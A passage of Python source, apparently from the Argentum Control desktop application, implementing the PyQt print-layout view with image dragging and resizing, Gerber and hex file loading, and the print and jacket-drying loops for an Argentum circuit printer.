self.printPlateArea = PrintRect(0, 0, 285, 255)
self.printArea = PrintRect(24, 73, 247, 127)
self.printLims = PrintRect(10, 14, 157, 98)
self.rollLims = PrintRect(80, 14, 87, 98)
self.printPlateDesign = QtSvg.QSvgRenderer("printPlateDesign.svg")
self.trashCan = QtSvg.QSvgRenderer("trashCan.svg")
self.trashCanOpen = QtSvg.QSvgRenderer("trashCanOpen.svg")
self.showTrashCanOpen = False
height = self.printArea.height * printPlateDesignScale[1]
self.printPlateDesignArea = PrintRect(12,
50,
self.printArea.width * printPlateDesignScale[0],
height)
self.images = []
self.setAcceptDrops(True)
self.setMouseTracking(True)
self.kerfPen = QtGui.QPen(QtGui.QColor(0, 0, 0))
self.kerfPen.setWidth(10)
self.kerfPen.setCapStyle(QtCore.Qt.RoundCap)
self.kerfOutlinePen = QtGui.QPen(QtGui.QColor(255, 255, 255))
self.kerfOutlinePen.setWidth(13)
self.kerfOutlinePen.setCapStyle(QtCore.Qt.RoundCap)
self.fanImage1 = QtGui.QPixmap("fan1.png")
self.fanImage2 = QtGui.QPixmap("fan2.png")
self.printHeadPixmap = QtGui.QPixmap("printhead.png")
self.printHeadImage = PrintImage(self.printHeadPixmap, "")
self.printHeadImage.minLeft = -24 + 10
self.printHeadImage.left = self.printHeadImage.minLeft
self.printHeadImage.minBottom = -73 + 11
self.printHeadImage.bottom = self.printHeadImage.minBottom
#self.printHeadImage.width = 95
#self.printHeadImage.height = 90
self.printHeadImage.width = 98
self.printHeadImage.height = 95
self.images.append(self.printHeadImage)
self.colorPicker = QtGui.QColorDialog()
self.pickColorFor = None
self.colorPicker.colorSelected.connect(self.colorPicked)
self.showingPrintHead = False
self.printButton = QtGui.QPushButton("Print")
self.printButton.clicked.connect(self.startPrint)
mainLayout = QtGui.QVBoxLayout()
layout = QtGui.QHBoxLayout()
layout.addStretch()
layout.addWidget(self.printButton)
layout.addStretch()
mainLayout.addStretch()
mainLayout.addLayout(layout)
self.setLayout(mainLayout)
self.imageList = ImageList(self)
def updatePrintHeadPos(self, pos):
if self.dragging == self.printHeadImage:
return
(xmm, ymm, x, y) = pos
self.printHeadImage.left = self.printHeadImage.minLeft + xmm
self.printHeadImage.bottom = self.printHeadImage.minBottom + ymm
self.printHeadImage.screenRect = None
self.update()
def showPrintHeadActionTriggered(self):
if self.showingPrintHead:
self.showingPrintHead = False
else:
self.showingPrintHead = True
self.argentum.updatePosDisplay()
self.update()
def showPrintLimsActionTriggered(self):
self.update()
def showRollLimsActionTriggered(self):
self.update()
def ratePrintActionTriggered(self):
rateDialog = RateYourPrintDialog(self)
rateDialog.exec_()
def nozzleTestActionTriggered(self):
pi = self.addImageFile("BothCartridgesNew.hex")
image = QtGui.QImage(pi.pixmap.width(), pi.pixmap.height(), QtGui.QImage.Format_RGB32)
image.fill(0xffffff)
p = QtGui.QPainter()
p.begin(image)
p.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(0, 0, 0)), 10, QtCore.Qt.SolidLine))
m = 20
h = image.height() / 9
for j in range(1, 10):
p.drawLine(m, j * h - h/2, image.width()-m, j * h - h/2)
p.drawLine(m, 1 * h - h/2, image.width()-m, 5 * h - h/2)
p.drawLine(m, 5 * h - h/2, image.width()-m, 9 * h - h/2)
p.end()
pi.pixmap = QtGui.QPixmap.fromImage(image)
def dryActionTriggered(self):
if self.printThread != None:
print("Already printing!")
return
self.printCanceled = False
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Drying")
self.progress.setLabelText("Starting up...")
self.progress.setValue(0)
self.progress.show()
self.printThread = threading.Thread(target=self.dryingLoop)
self.printThread.dryingOnly = True
self.printThread.start()
def dryingLoop(self):
try:
if self.argentum.options["use_rollers"] == False:
return
except:
pass
print("Drying mode on.")
try:
printer = self.argentum.printer
printer.command("l E", expect='rollers')
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
print("Jacket drying.")
self.setProgress(labelText="Drying " + image.hexFilename)
pos = self.printAreaToMove(image.left + image.width - 60, image.bottom + 30)
x = pos[0]
y = pos[1]
sy = y
while y - sy < image.height * 80:
while self.progress.paused:
time.sleep(0.5)
printer.moveTo(x, y, withOk=True)
printer.waitForResponse(timeout=10, expect='Ok')
printer.command("l d", expect='rollers')
time.sleep(1.5)
left = x - int(image.width * 1.5) * 80
if left < 0:
left = 0
while self.progress.paused:
time.sleep(0.5)
printer.moveTo(left, y, withOk=True)
printer.waitForResponse(timeout=10, expect='Ok')
printer.command("l r", expect='rollers')
time.sleep(1.5)
y = y + 30 * 80
printer.command("l e", expect='rollers')
finally:
if self.printThread.dryingOnly:
self.printThread = None
self.setProgress(percent=100)
self.argentum.printer.home()
print("Your jacket is now dry.")
def calcScreenRects(self):
if self.lastRect == self.rect():
for image in self.images:
if image.screenRect == None:
image.screenRect = self.printAreaToScreen(image)
return
self.lastRect = self.rect()
# Ensure correct aspect ratio
aspectRect = QtCore.QRectF(self.rect())
aspectRatio = aspectRect.width() / aspectRect.height()
desiredAspectRatio = (self.printPlateArea.width /
self.printPlateArea.height)
#print("window {} x {}".format(aspectRect.width(), aspectRect.height()))
#print("aspect ratio {}".format(aspectRatio))
#print("desired aspect ratio {}".format(desiredAspectRatio))
if aspectRatio < desiredAspectRatio:
height = aspectRect.height() * (aspectRatio / desiredAspectRatio)
#print("calculated height {}".format(height))
#print("calculated aspect ratio {}".format(aspectRect.width() / height))
aspectRect.setTop((aspectRect.height() - height) / 2)
aspectRect.setHeight(height)
else:
width = aspectRect.width() / (aspectRatio / desiredAspectRatio)
#print("calculated width {}".format(width))
#print("calculated aspect ratio {}".format(width / aspectRect.height()))
aspectRect.setLeft((aspectRect.width() - width) / 2)
aspectRect.setWidth(width)
#print("printPlateRect is {}, {} {} x {}".format(aspectRect.left(),
# aspectRect.top(),
# aspectRect.width(),
# aspectRect.height()))
self.printPlateRect = aspectRect
# Now we can make the screen rects
self.printPlateDesignRect = self.printToScreen(self.printPlateDesignArea)
for image in self.images:
image.screenRect = self.printAreaToScreen(image)
self.trashCanRect = QtCore.QRectF(
(self.printPlateDesignRect.left() +
self.printPlateDesignRect.width() * 17 / 21),
(self.printPlateDesignRect.top() +
self.printPlateDesignRect.height() * 5 / 7),
self.printPlateDesignRect.width() / 8,
self.printPlateDesignRect.height() / 5)
ppdr = self.printPlateDesignRect
my = 30
mx = 30
self.leftLightsRect = QtCore.QRectF(ppdr.left() - mx - 10, ppdr.top() - my, mx, ppdr.height() + my*2)
self.rightLightsRect = QtCore.QRectF(ppdr.right() + mx / 2, ppdr.top() - my, mx, ppdr.height() + my*2)
self.bottomLightRects = []
mmx = mx/3
self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()*0.05, self.leftLightsRect.bottom() + my, mmx, mmx))
self.bottomLightRects.append(QtCore.QRectF(ppdr.left() + ppdr.width()/2 - mmx/2, self.leftLightsRect.bottom() + my, mmx, mmx))
self.bottomLightRects.append(QtCore.QRectF(ppdr.right() - ppdr.width()/13, self.leftLightsRect.bottom() + my, mmx, mmx))
self.leftKerfRect = QtCore.QRectF(ppdr.left() - mx*2, ppdr.bottom(), mx*2, my*2 + mmx*2)
self.rightKerfRect = QtCore.QRectF(ppdr.right(), ppdr.bottom(), mx*2, my*2 + mmx*2)
self.fanImage = self.fanImage1
fw = ppdr.width() / 13
self.leftFanRect = QtCore.QRectF(ppdr.left(), ppdr.top() - fw*2, fw, fw)
self.rightFanRect = QtCore.QRectF(ppdr.right() - fw, ppdr.top() - fw*2, fw, fw)
def printToScreen(self, printRect):
#print("printRect {}, {} {} x {}".format(printRect.left,
# printRect.bottom,
# printRect.width,
# printRect.height))
#print("printPlateArea {} x {}".format(self.printPlateArea.width,
# self.printPlateArea.height))
left = (self.printPlateRect.left() +
printRect.left / self.printPlateArea.width
* self.printPlateRect.width())
top = (self.printPlateRect.top() + self.printPlateRect.height() -
(printRect.bottom + printRect.height)
/ self.printPlateArea.height
* self.printPlateRect.height())
width = (printRect.width / self.printPlateArea.width
* self.printPlateRect.width())
height = (printRect.height / self.printPlateArea.height
* self.printPlateRect.height())
#print("on screen {}, {} {} x {}".format(left, top, width, height))
return QtCore.QRectF(left, top, width, height)
def printAreaToScreen(self, printRect):
p = PrintRect(self.printArea.left + printRect.left,
self.printArea.bottom + printRect.bottom,
printRect.width, printRect.height)
return self.printToScreen(p)
def printAreaToMove(self, offsetX, offsetY):
fudgeX = -80
fudgeY = -560
x = offsetX * 80 + fudgeX
y = offsetY * 80 + fudgeY
x = int(x)
y = int(y)
return (x, y)
def screenToPrintArea(self, x, y):
r = self.printToScreen(self.printArea)
dx = x - r.left()
dy = y - r.top()
return (dx * self.printArea.width / r.width(),
self.printArea.height - dy * self.printArea.height / r.height())
def updateTitle(self):
if self.layout:
name = os.path.basename(self.layout)
if name.find('.layout') == len(name)-7:
name = name[:len(name)-7]
self.argentum.setWindowTitle(name + " - Argentum Control")
else:
self.argentum.setWindowTitle("Argentum Control")
def paintEvent(self, event):
self.updateTitle()
self.calcScreenRects()
qp = QtGui.QPainter()
qp.begin(self)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine))
qp.fillRect(self.rect(), QtGui.QColor(0,0,0))
self.printPlateDesign.render(qp, self.printPlateDesignRect)
if self.argentum.showPrintLimsAction.isChecked():
printLimsScreenRect = self.printAreaToScreen(self.printLims)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.DashLine))
qp.drawRect(printLimsScreenRect)
qp.setPen(QtGui.QPen(QtGui.QBrush(QtGui.QColor(255, 255, 255)), 1, QtCore.Qt.SolidLine))
if self.argentum.showRollLimsAction.isChecked():
rollLimsScreenRect = self.printAreaToScreen(self.rollLims)
qp.drawRect(rollLimsScreenRect)
if self.dragging and self.dragging != self.printHeadImage:
if self.showTrashCanOpen:
self.trashCanOpen.render(qp, self.trashCanRect)
else:
self.trashCan.render(qp, self.trashCanRect)
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
if image == self.selection or image == self.selection2:
r = QtCore.QRectF(image.screenRect)
r.setLeft(r.left()-1)
r.setTop(r.top()-1)
r.setWidth(r.width()+2)
r.setHeight(r.height()+2)
qp.fillRect(r, QtGui.QColor(0, 54, 128))
qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect())
if self.showingPrintHead:
image = self.printHeadImage
qp.drawPixmap(image.screenRect, image.pixmap, image.pixmapRect())
if self.argentum.printer.connected and self.argentum.printer.lightsOn:
qp.setBrush(QtGui.QColor(0xff, 0xff, 0xff))
else:
qp.setBrush(QtGui.QColor(0xc6, 0xac, 0xac))
qp.setPen(QtGui.QColor(0, 0, 0))
qp.drawRoundedRect(self.leftLightsRect, 20.0, 15.0)
qp.drawRoundedRect(self.rightLightsRect, 20.0, 15.0)
for r in self.bottomLightRects:
qp.drawRect(r)
qp.setPen(self.kerfOutlinePen)
qp.drawArc(self.leftKerfRect, 180*16, 90*16)
qp.setPen(self.kerfPen)
qp.drawArc(self.leftKerfRect, 180*16, 90*16)
qp.setPen(self.kerfOutlinePen)
qp.drawArc(self.rightKerfRect, 270*16, 90*16)
qp.setPen(self.kerfPen)
qp.drawArc(self.rightKerfRect, 270*16, 90*16)
fanImage = self.fanImage1
if self.argentum.printer.leftFanOn:
fanImage = self.fanImage
qp.drawPixmap(self.leftFanRect, fanImage, QtCore.QRectF(fanImage.rect()))
fanImage = self.fanImage1
if self.argentum.printer.rightFanOn:
fanImage = self.fanImage
qp.drawPixmap(self.rightFanRect, fanImage, QtCore.QRectF(fanImage.rect()))
qp.end()
def gerberToPixmap(self, inputFileName):
try:
f = open(inputFileName, "r")
contents = f.read()
f.close()
except:
return None
if contents[:1] != "G" and contents[:1] != '%':
return None
g = Gerber()
g.parse(contents)
if len(g.errors) > 0:
str = "Errors parsing Gerber file {}\n".format(inputFileName)
for error in g.errors:
lineno, msg = error
str = str + "{}: {}\n".format(lineno, msg)
QtGui.QMessageBox.information(self, "Invalid Gerber file", str)
return False
r = QtSvg.QSvgRenderer(QtCore.QByteArray(g.toSVG()))
print("Gerber size {} x {} {}".format(g.width, g.height, g.units))
if g.units == "inches":
pixmap = QtGui.QPixmap(g.width * 25.4 * imageScale[0],
g.height * 25.4 * imageScale[1])
else:
pixmap = QtGui.QPixmap(g.width * imageScale[0],
g.height * imageScale[1])
p = QtGui.QPainter(pixmap)
r.render(p, QtCore.QRectF(pixmap.rect()))
if pixmap.width() / imageScale[0] > 230 or pixmap.height() / imageScale[1] > 120:
QtGui.QMessageBox.information(self, "Gerber file too big", "The design provided is too big for the print area. It will be resized to fit, but this is probably not what you want.")
return pixmap
def pixmapFromHexFile(self, inputFileName):
f = open(inputFileName)
lines = f.read().split('\n')
f.close()
width = 800
height = 0
theight = 0
for line in lines:
if line.startswith('M Y -'):
h = int(line[5:])
if h > height:
height = h
elif line.startswith('M X -'):
w = int(line[5:])
width += w
elif line.startswith('M Y'):
theight += int(line[4:])
print("height={} theight={}".format(height, theight))
if height == 0:
height = theight
else:
height -= (104 * 2) * 4 # blank lines
print("{}x{}".format(width, height))
image = QtGui.QImage(width / 4, height / 4, QtGui.QImage.Format_RGB32)
image.fill(0xffffff)
p = QtGui.QPainter()
p.begin(image)
p.setFont(QtGui.QFont('arial', 80))
lotshex = "hex "
for i in range(10):
lotshex = lotshex + lotshex
p.drawText(image.rect(), QtCore.Qt.TextWordWrap, lotshex)
p.end()
return QtGui.QPixmap.fromImage(image)
def pixmapFromFilename(self, inputFileName):
if inputFileName.endswith(".hex"):
pixmap = self.pixmapFromHexFile(inputFileName)
try:
shutil.copy(inputFileName, self.argentum.filesDir)
except:
pass
else:
pixmap = QtGui.QPixmap(inputFileName)
if pixmap == None or pixmap.isNull():
pixmap = self.gerberToPixmap(inputFileName)
if pixmap == False:
return None
if pixmap == None or pixmap.isNull():
QtGui.QMessageBox.information(self, "Invalid image file", "Can't load image " + inputFileName)
return None
if inputFileName[-4:] == ".svg":
# Assume SVG files are in millimeters already
pixmap = pixmap.scaled(pixmap.width() * imageScale[0],
pixmap.height() * imageScale[1])
r = QtSvg.QSvgRenderer(inputFileName)
p = QtGui.QPainter(pixmap)
r.render(p, QtCore.QRectF(pixmap.rect()))
return pixmap
def addImageFile(self, inputFileName):
pixmap = self.pixmapFromFilename(inputFileName)
pi = PrintImage(pixmap, inputFileName)
self.images.append(pi)
self.ensureImageInPrintLims(pi)
self.update()
self.imageList.update()
self.layoutChanged = True
return pi
def isImageProcessed(self, image):
hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename)
if not os.path.exists(hexFilename):
return False
if os.path.getsize(hexFilename) == 0:
return False
hexModified = os.path.getmtime(hexFilename)
if time.time() - hexModified > 7*24*60*60:
return False
last_printer_options_changed = self.argentum.getOption("last_printer_options_changed", None)
if last_printer_options_changed != None and hexModified < last_printer_options_changed:
return False
imgModified = os.path.getmtime(image.filename)
if imgModified < hexModified:
if image.lastResized:
return image.lastResized < hexModified
return True
return False
def imageProgress(self, y, max_y):
if self.printCanceled:
return False
percent = (y * 100.0 / max_y)
if percent > 99:
percent = 99
self.setProgress(percent=percent)
return True
def sendProgress(self, pos, size):
if self.printPaused:
return "Pause"
if self.printCanceled:
return False
self.setProgress(percent=(20 + self.perImage * pos / size))
return True
def processImage(self, image):
if image.filename.endswith(".hex"):
return
ip = self.argentum.getImageProcessor()
hexFilename = os.path.join(self.argentum.filesDir, image.hexFilename)
try:
size = None
if image.lastResized != None:
width = image.width * imageScale[0]
height = image.height * imageScale[1]
size = (int(width), int(height))
print("resizing {} to {},{}.".format(hexFilename, size[0], size[1]))
print("original size {},{}.".format(image.pixmap.width(), image.pixmap.height()))
image.hexFilename = "{}-{}x{}.hex".format(
image.hexFilename[:-4], size[0], size[1])
hexFilename = os.path.join(self.argentum.filesDir,
image.hexFilename)
self.layoutChanged = True
ip.sliceImage(image.pixmap.toImage(), hexFilename,
progressFunc=self.imageProgress,
size=size)
except Exception as e:
print("error processing {}: {}.".format(image.filename, e))
self.setProgress(labelText="Error processing {}.".format(image.filename))
print("removing {}.".format(hexFilename))
os.remove(hexFilename)
raise
curPercent = 0
percent = None
labelText = None
statusText = None
missing = None
printCanceled = False
printPaused = False
def setProgress(self, percent=None,
incPercent=None,
labelText=None,
statusText=None,
missing=None,
canceled=None):
if self.printCanceled:
raise PrintCanceledException()
if percent:
self.percent = percent
self.curPercent = percent
if incPercent:
self.curPercent = self.curPercent + incPercent
self.percent = self.curPercent
if labelText:
self.labelText = labelText
if statusText:
self.statusText = statusText
if missing:
canceled = True
self.missing = missing
if canceled:
self.printCanceled = canceled
def reportMissing(self, missing):
# I swear on Poseidon's trident, one day I shall remove the need
# for this Sneaker Net bullshit
msgbox = QtGui.QMessageBox()
msgbox.setWindowTitle("Sneaker Net Required.")
msgbox.setText("One or more files are missing from, or different on the printer.")
msgbox.setDetailedText('\n'.join(missing))
msgbox.exec_()
def progressUpdater(self):
QtCore.QTimer.singleShot(100, self.progressUpdater)
if self.percent:
self.progress.setValue(self.percent)
if self.percent == 20:
self.update()
self.percent = None
if self.labelText:
self.progress.setLabelText(self.labelText)
self.labelText = None
if self.statusText:
self.argentum.statusBar().showMessage(self.statusText)
self.statusText = None
if self.progress.wasCanceled() or self.printCanceled:
if not self.printCanceled:
self.argentum.printer.stop()
if self.progress.wasCanceled():
self.argentum.statusBar().showMessage("Print canceled.")
self.printCanceled = True
self.progress.hide()
self.printPaused = self.progress.paused
if self.missing:
missing = self.missing
self.missing = None
self.reportMissing(missing)
def fanAnimator(self):
QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator)
if self.argentum.printer.leftFanOn or self.argentum.printer.rightFanOn:
if self.fanImage == self.fanImage1:
self.fanImage = self.fanImage2
else:
self.fanImage = self.fanImage1
self.update()
def printCross(self, x, y):
pos = self.printAreaToMove(x, y)
self.argentum.printer.move(pos[0], pos[1], wait=True)
self.argentum.printer.Print("cross.hex", wait=True)
def printCrossPattern(self, x, y):
self.setProgress(labelText="Printing cross pattern...")
self.printCross(x+ 0, y+ 0)
self.setProgress(percent=20)
self.printCross(x+10, y+ 0)
self.setProgress(percent=40)
self.printCross(x+20, y+ 0)
self.setProgress(percent=60)
self.printCross(x+10, y+10)
self.setProgress(percent=80)
self.printCross(x+10, y+20)
self.setProgress(percent=100)
def startPrint(self):
if len(self.images) == 1:
QtGui.QMessageBox.information(self,
"Nothing to print",
"You can add images to the print view by selecting\nFile -> Import Image or by simply dragging and dropping images onto the layout. All standard image file formats are supported, as well as industry standard Gerber files. You can also cut and paste from any graphics editing program.")
return
if self.printThread != None:
print("Already printing!")
return
options = PrintOptionsDialog(self)
if options.exec_() == options.Rejected:
return
self.printCanceled = False
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Printing")
self.progress.setLabelText("Starting up...")
self.progress.setValue(0)
self.progress.show()
self.printThread = threading.Thread(target=self.printLoop)
self.printThread.passes = options.getPasses()
self.printThread.useRollers = options.getUseRollers()
self.printThread.alsoPause = options.getAlsoPause()
self.printThread.dryingOnly = False
self.printThread.start()
def printLoop(self):
try:
self.setProgress(statusText="Printing.")
processingStart = time.time()
self.setProgress(labelText="Processing images...")
self.perImage = 20.0 / (len(self.images) - 1)
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
if not self.isImageProcessed(image):
self.setProgress(labelText="Processing image {}.".format(os.path.basename(image.filename)))
self.processImage(image)
else:
print("Skipping processing of image {}.".format(image.filename))
self.setProgress(incPercent=self.perImage)
processingEnd = time.time()
self.argentum.addTimeSpentProcessingImages(processingEnd - processingStart)
if not self.argentum.printer.connected:
self.setProgress(labelText="Printer isn't connected.", statusText="Print aborted. Connect your printer.", canceled=True)
return
if (self.argentum.printer.version == None or
self.argentum.printer.majorVersion == 0 and
self.argentum.printer.minorVersion < 15):
self.setProgress(labelText="Printer firmware too old.", statusText="Print aborted. Printer firmware needs upgrade.", canceled=True)
return
self.argentum.printer.monitorEnabled = False
volts = self.argentum.printer.volt()
if volts < 5:
self.setProgress(labelText="Please turn on your printer.")
while volts < 5:
volts = self.argentum.printer.volt()
self.setProgress(percent=20, labelText="Starting print.")
self.argentum.printer.turnLightsOn()
self.argentum.printer.command("l E", expect='rollers')
self.argentum.printer.command("l r", expect='rollers')
time.sleep(1.5)
self.argentum.printer.command("l e", expect='rollers')
self.argentum.printer.turnMotorsOn()
self.argentum.setSpeed()
self.argentum.printer.home(wait=True)
# Now we can actually print!
printingStart = time.time()
for i in range(0, self.printThread.passes):
self.setProgress(percent=20, labelText="Starting pass {}".format(i+1))
self.perImage = 79.0 / (len(self.images) - 1)
nImage = 0
for image in self.images:
if image == self.printHeadImage:
continue
if not image.visible:
continue
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
pos = self.printAreaToMove(image.left + image.width, image.bottom)
if image.filename.endswith(".hex"):
pos = (pos[0] - 15 * 80, pos[1] + 560 + 25 * 80)
self.argentum.printer.moveTo(pos[0], pos[1], withOk=True)
response = self.argentum.printer.waitForResponse(timeout=10, expect='Ok')
if response:
response = ''.join(response)
if response.find('/') != -1:
self.setProgress(statusText="Print error - ensure images are within print limits.", canceled=True)
return
self.setProgress(labelText="Pass {}: {}".format(i + 1, image.hexFilename))
path = os.path.join(self.argentum.filesDir, image.hexFilename)
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
if not self.argentum.printer.send(path, progressFunc=self.sendProgress, printOnline=True):
self.setProgress(labelText="Printer error.", canceled=True)
return
nImage = nImage + 1
self.setProgress(percent=(20 + self.perImage * nImage))
printingEnd = time.time()
print("printed in {} s".format(printingEnd - printingStart))
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
printingStart = time.time()
if self.printThread.useRollers:
self.dryingLoop()
if self.printThread.alsoPause:
self.setProgress(labelText="Pausing before next pass.")
if not self.progress.paused:
self.progress.pause()
self.argentum.printer.moveTo(100, 100, withOk=True)
self.argentum.printer.waitForResponse(timeout=10, expect='Ok')
while self.progress.paused:
time.sleep(0.5)
if self.printCanceled:
raise PrintCanceledException()
printingEnd = time.time()
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
printingStart = time.time()
self.argentum.printer.home()
self.setProgress(statusText='Print complete.', percent=100)
printingEnd = time.time()
self.argentum.addTimeSpentPrinting(printingEnd - printingStart)
except PrintCanceledException:
pass
except Exception as e:
print(e)
self.setProgress(statusText="Print error.", canceled=True)
raise
finally:
self.printThread = None
self.argentum.printingCompleted = True
self.argentum.printer.monitorEnabled = True
def movePrintHead(self):
xmm = self.printHeadImage.left - self.printHeadImage.minLeft
ymm = self.printHeadImage.bottom - self.printHeadImage.minBottom
self.argentum.printer.moveTo(xmm * 80, ymm * 80)
def inTrashCan(self, image):
if image == None:
return False
if image.screenRect == None:
image.screenRect = self.printAreaToScreen(image)
return self.trashCanRect.intersect(image.screenRect)
def mousePressEvent(self, event):
if event.modifiers() == QtCore.Qt.NoModifier:
self.selection = None
self.selection2 = None
else:
self.selection2 = None
p = self.screenToPrintArea(event.pos().x(), event.pos().y())
if p == None:
return
px = p[0]
py = p[1]
for image in reversed(self.images):
if image == self.printHeadImage:
continue
if not image.visible:
continue
if py >= image.bottom and py < image.bottom + image.height:
if px >= image.left and px < image.left + image.width:
if event.modifiers() == QtCore.Qt.NoModifier:
self.selection = image
else:
if self.selection == None:
self.selection = image
else:
self.selection2 = image
break
def mouseReleaseEvent(self, event):
if self.dragging:
if self.dragging == self.printHeadImage:
self.movePrintHead()
else:
if self.inTrashCan(self.dragging):
self.images.remove(self.dragging)
self.layoutChanged = True
else:
self.ensureImageInPrintLims(self.dragging)
self.dragging.screenRect = None
self.layoutChanged = True
elif self.resizing:
self.ensureImageInPrintLims(self.resizing)
self.resizing.screenRect = None
self.layoutChanged = True
else:
lights = False
if self.leftLightsRect.contains(event.pos()):
lights = True
if self.rightLightsRect.contains(event.pos()):
lights = True
for light in self.bottomLightRects:
if light.contains(event.pos()):
lights = True
if lights:
if self.argentum.printer.lightsOn:
self.argentum.printer.turnLightsOff()
else:
self.argentum.printer.turnLightsOn()
if self.leftFanRect.contains(event.pos()):
if self.argentum.printer.leftFanOn:
self.argentum.printer.turnLeftFanOff()
else:
self.argentum.printer.turnLeftFanOn()
if self.rightFanRect.contains(event.pos()):
if self.argentum.printer.rightFanOn:
self.argentum.printer.turnRightFanOff()
else:
self.argentum.printer.turnRightFanOn()
kerf = False
if self.leftKerfRect.contains(event.pos()):
kerf = True
if self.rightKerfRect.contains(event.pos()):
kerf = True
if kerf:
if self.colorPicker.isVisible():
self.colorPicker.hide()
else:
self.colorPicker.show()
if self.dragging and self.dragging != self.printHeadImage:
self.selection = self.dragging
elif self.resizing:
self.selection = self.resizing
self.dragging = None
self.resizing = None
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.update()
def colorPicked(self, color):
self.argentum.printer.command("red {}".format(color.red()))
self.argentum.printer.command("green {}".format(color.green()))
self.argentum.printer.command("blue {}".format(color.blue()))
self.kerfPen.setColor(color)
self.update()
def ensureImageInPrintLims(self, image):
if image == self.printHeadImage:
if image.left < image.minLeft:
image.left = image.minLeft
if image.bottom < image.minBottom:
image.left = image.minBottom
return
if image.left < self.printLims.left:
image.left = self.printLims.left
if image.bottom < self.printLims.bottom:
image.bottom = self.printLims.bottom
if image.left + image.width > self.printLims.left + self.printLims.width:
image.left = (self.printLims.left +
self.printLims.width - image.width)
if image.bottom + image.height > self.printLims.bottom + self.printLims.height:
image.bottom = (self.printLims.bottom +
self.printLims.height - image.height)
if image.left < self.printLims.left:
image.left = self.printLims.left
image.width = self.printLims.width
if image.bottom < self.printLims.bottom:
image.bottom = self.printLims.bottom
image.height = self.printLims.height
def mouseMoveEvent(self, event):
pressed = event.buttons() & QtCore.Qt.LeftButton
p = self.screenToPrintArea(event.pos().x(), event.pos().y())
if p == None:
if self.dragging == None and self.resizing == None:
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
return
self.showTrashCanOpen = self.inTrashCan(self.dragging)
px = p[0]
py = p[1]
#print("{}, {}".format(px, py))
if pressed and self.dragging != None:
image = self.dragging
image.left = px - self.dragStart[0] + self.dragImageStart[0]
image.bottom = py - self.dragStart[1] + self.dragImageStart[1]
image.screenRect = None
self.layoutChanged = True
self.update()
elif pressed and self.resizing != None:
image = self.resizing
(leftEdge, rightEdge, topEdge, bottomEdge) = self.resizeEdges
(startLeft, startBottom, startWidth, startHeight) = self.resizeImageStart
dx = px - self.resizeStart[0]
dy = py - self.resizeStart[1]
if leftEdge:
if dx + startLeft < startLeft + startWidth:
image.left = dx + startLeft
image.width = startWidth + startLeft - image.left
elif rightEdge:
if dx + startWidth > 0:
image.width = dx + startWidth
if topEdge:
if dy + startHeight > 0:
image.height = dy + startHeight
elif bottomEdge:
if dy + startBottom < startBottom + startHeight:
image.bottom = dy + startBottom
image.height = startHeight + startBottom - image.bottom
image.lastResized = time.time()
image.screenRect = None
self.layoutChanged = True
self.update()
elif self.dragging == None and self.resizing == None:
hit = False
for image in reversed(self.images):
if image == self.printHeadImage and not self.showingPrintHead:
continue
if not image.visible:
continue
leftEdge = False
rightEdge = False
topEdge = False
bottomEdge = False
n = 1.1 if pressed else 1.0
if (py >= image.bottom - n and
py < image.bottom + image.height + n):
if px >= image.left - n and px <= image.left:
leftEdge = True
if (px < image.left + image.width + n and
px >= image.left + image.width):
rightEdge = True
if (px >= image.left - n and
px < image.left + image.width + n):
if py >= image.bottom - n and py <= image.bottom:
bottomEdge = True
if (py < image.bottom + image.height + n and
py >= image.bottom + image.height):
topEdge = True
anyEdge = True
if leftEdge and bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor))
elif rightEdge and topEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeBDiagCursor))
elif leftEdge and topEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
elif rightEdge and bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeFDiagCursor))
elif leftEdge or rightEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeHorCursor))
elif topEdge or bottomEdge:
self.setCursor(QtGui.QCursor(QtCore.Qt.SizeVerCursor))
else:
anyEdge = False
if image == self.printHeadImage or image.filename.endswith(".hex"):
anyEdge = False
if anyEdge:
hit = True
if pressed:
self.resizing = image
self.resizeImageStart = (image.left, image.bottom, image.width, image.height)
self.resizeStart = (px, py)
self.resizeEdges = (leftEdge, rightEdge, topEdge, bottomEdge)
break
if px >= image.left and px < image.left + image.width:
if py >= image.bottom and py < image.bottom + image.height:
hit = True
if pressed:
self.dragging = image
self.dragImageStart = (image.left, image.bottom)
self.dragStart = (px, py)
self.setCursor(QtGui.QCursor(QtCore.Qt.ClosedHandCursor))
else:
self.setCursor(QtGui.QCursor(QtCore.Qt.OpenHandCursor))
break
if not hit:
self.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
def dragEnterEvent(self, e):
self.argentum.raise_()
self.argentum.activateWindow()
e.accept()
def dropEvent(self, e):
if e.mimeData().hasUrls():
url = str(e.mimeData().urls()[0].path())
pi = self.addDroppedFile(url, e.pos())
if pi:
self.selection = pi
def addDroppedFile(self, path, pos=None):
if path[0] == '/' and path[2] == ':':
# Windows
path = path[1:]
if path[-7:] == ".layout":
self.openLayout(path)
return None
pi = self.addImageFile(path)
if pi == None:
return None
if pos:
p = self.screenToPrintArea(pos.x(), pos.y())
else:
p = (self.printLims.left + self.printLims.width / 2,
self.printLims.bottom + self.printLims.height / 2)
if p != None:
pi.left = p[0] - pi.width / 2
